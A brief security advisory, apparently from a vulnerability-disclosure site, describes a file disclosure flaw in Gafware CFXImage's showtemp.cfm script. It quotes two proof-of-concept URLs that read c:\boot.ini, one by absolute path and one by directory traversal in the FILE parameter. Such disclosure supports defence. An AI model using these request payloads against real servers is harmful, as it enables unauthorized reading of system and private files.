|
Gafware CFXImage ShowTemp File Disclosure Vulnerability
The following proof of concept was provided by ProCheckup: http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../../../../../../../../../../boot.ini This allows the attacker to view the contents of 'c:\boot.ini'. |
|
 Privacy Statement |
